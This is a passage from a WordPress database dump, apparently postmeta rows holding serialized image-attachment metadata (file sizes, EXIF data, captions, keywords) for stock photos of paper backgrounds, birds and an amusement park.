"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-627x400.jpg\";s:5:\"width\";i:627;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"amusmentpark2381-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(301,119,'_wp_attached_file','2017/10/amusmentpark2385.jpg'),(302,119,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:28:\"2017/10/amusmentpark2385.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"amusmentpark2385-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:29:\"amusmentpark2385-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"amusmentpark2385-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"amusmentpark2385-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(303,120,'_wp_attached_file','2017/10/backgroundpaper0650.jpg'),(304,120,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:31:\"2017/10/backgroundpaper0650.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"backgroundpaper0650-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"backgroundpaper0650-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0650-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"backgroundpaper0650-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.4\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:4:\"E950\";s:7:\"caption\";s:84:\"Layers of simple wrinkled blue wrapping paper as abstract background with copy space\";s:17:\"created_timestamp\";s:9:\"959451489\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:4:\"14.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:17:\"0.052631578947368\";s:5:\"title\";s:43:\"Layers of blue wrapping paper as background\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:8:\"textured\";i:3;s:4:\"blue\";i:4;s:7:\"creased\";i:5;s:8:\"crumpled\";i:6;s:6:\"layers\";i:7;s:5:\"paper\";i:8;s:8:\"wrapping\";i:9;s:8:\"wrinkled\";}}}'),(305,121,'_wp_attached_file','2017/10/backgroundpaper0655.jpg'),(306,121,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:31:\"2017/10/backgroundpaper0655.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"backgroundpaper0655-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"backgroundpaper0655-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"backgroundpaper0655-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"backgroundpaper0655-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:77:\"Extreme close up of wrinkled periwinkle paper creating an abstract background\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:45:\"Extreme close up of wrinkled periwinkle paper\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:7:\"texture\";i:3;s:8:\"crumpled\";i:4;s:5:\"paper\";i:5;s:10:\"periwinkle\";i:6;s:6:\"purple\";i:7;s:6:\"violet\";i:8;s:8:\"wrinkled\";i:9;s:8:\"close up\";}}}'),(307,122,'_wp_attached_file','2017/10/backgroundpaper1416.jpg'),(308,122,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:31:\"2017/10/backgroundpaper1416.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1416-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1416-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1416-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"backgroundpaper1416-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:95:\"Detailed background of wrinkled paper in white neutral color with rough texture with copy space\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:43:\"Background of wrinkled paper in white color\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:8:\"crumpled\";i:3;s:10:\"decoration\";i:4;s:10:\"decorative\";i:5;s:5:\"paper\";i:6;s:4:\"soft\";i:7;s:5:\"white\";i:8;s:8:\"wrinkled\";i:9;s:7:\"neutral\";}}}'),(309,123,'_wp_attached_file','2017/10/backgroundpaper1419.jpg'),(310,123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:31:\"2017/10/backgroundpaper1419.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1419-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1419-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1419-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"backgroundpaper1419-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"9.8\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:4:\"E950\";s:7:\"caption\";s:91:\"Single layer of simple wrinkled brown wrapping paper as abstract background with copy space\";s:17:\"created_timestamp\";s:9:\"965673761\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:2:\"15\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:46:\"Sheet of wrinkled wrapping paper as background\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:8:\"textured\";i:3;s:5:\"brown\";i:4;s:7:\"creased\";i:5;s:7:\"creases\";i:6;s:5:\"paper\";i:7;s:6:\"sheets\";i:8;s:8:\"wrinkled\";i:9;s:6:\"layers\";}}}'),(311,124,'_wp_attached_file','2017/10/backgroundpaper1449.jpg'),(312,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:31:\"2017/10/backgroundpaper1449.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1449-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"backgroundpaper1449-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"backgroundpaper1449-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"backgroundpaper1449-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:88:\"Extreme close up of crumpled waxy brown paper with highlights from overhead light source\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:45:\"Extreme close up of crumpled waxy brown paper\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:10:\"background\";i:1;s:7:\"creased\";i:2;s:7:\"creases\";i:3;s:8:\"crumpled\";i:4;s:5:\"paper\";i:5;s:7:\"surface\";i:6;s:8:\"textured\";i:7;s:9:\"wallpaper\";i:8;s:6:\"rumple\";i:9;s:10:\"stationery\";}}}'),(313,125,'_wp_attached_file','2017/10/bird4550.jpg'),(314,125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2017/10/bird4550.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"bird4550-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"bird4550-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"bird4550-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"bird4550-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:21:\"bird4550-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:20:\"bird4550-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:20:\"bird4550-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:20:\"bird4550-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:19:\"bird4550-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.8\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:16:\"PENTAX Optio 330\";s:7:\"caption\";s:48:\"a chaffinch eating crumbs left on a picnic table\";s:17:\"created_timestamp\";s:10:\"1062867857\";s:9:\"copyright\";s:128:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for detai\";s:12:\"focal_length\";s:4:\"22.8\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:17:\"english chaffinch\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:6:{i:0;s:9:\"chaffinch\";i:1;s:6:\"motion\";i:2;s:4:\"blur\";i:3;s:4:\"peck\";i:4;s:4:\"feed\";i:5;s:4:\"beak\";}}}'),(315,126,'_wp_attached_file','2017/10/birds_nest.jpg'),(316,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1664;s:4:\"file\";s:22:\"2017/10/birds_nest.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"birds_nest-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"birds_nest-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"birds_nest-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"birds_nest-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:23:\"birds_nest-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:22:\"birds_nest-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:22:\"birds_nest-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:22:\"birds_nest-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:21:\"birds_nest-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:40:\"Empty straw nest on a yellow background.\";s:17:\"created_timestamp\";s:10:\"1309531386\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:16:\"Empty Straw Nest\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:5:\"empty\";i:1;s:5:\"brown\";i:2;s:6:\"nature\";i:3;s:5:\"round\";i:4;s:7:\"natural\";i:5;s:4:\"home\";i:6;s:4:\"nest\";i:7;s:10:\"decoration\";i:8;s:7:\"shelter\";i:9;s:9:\"structure\";i:10;s:5:\"straw\";i:11;s:5:\"woven\";i:12;s:9:\"on yellow\";i:13;s:9:\"bird-nest\";i:14;s:8:\"birdnest\";}}}'),(317,127,'_wp_attached_file','2017/10/birds_on_wire.jpg'),(318,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1674;s:4:\"file\";s:25:\"2017/10/birds_on_wire.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"birds_on_wire-1024x686.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:686;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:26:\"birds_on_wire-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:25:\"birds_on_wire-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:24:\"birds_on_wire-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:89:\"Small flock of birds sitting perched on overhead cables against a blue sky with copyspace\";s:17:\"created_timestamp\";s:10:\"1263403838\";s:9:\"copyright\";s:48:\"www.freeimages.co.uk - see site for terms of use\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:32:\"Birds sitting on overhead cables\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"wildlife\";i:1;s:3:\"sky\";i:2;s:4:\"wild\";i:3;s:5:\"avian\";i:4;s:4:\"many\";i:5;s:6:\"cables\";i:6;s:4:\"wire\";i:7;s:10:\"vertebrate\";i:8;s:5:\"wings\";i:9;s:3:\"fly\";i:10;s:5:\"birds\";i:11;s:9:\"feathered\";i:12;s:7:\"perched\";i:13;s:9:\"behaviour\";i:14;s:6:\"winged\";}}}'),(319,128,'_wp_attached_file','2017/10/black_and_white_lemur.jpg'),(320,128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1664;s:4:\"file\";s:33:\"2017/10/black_and_white_lemur.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"black_and_white_lemur-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/j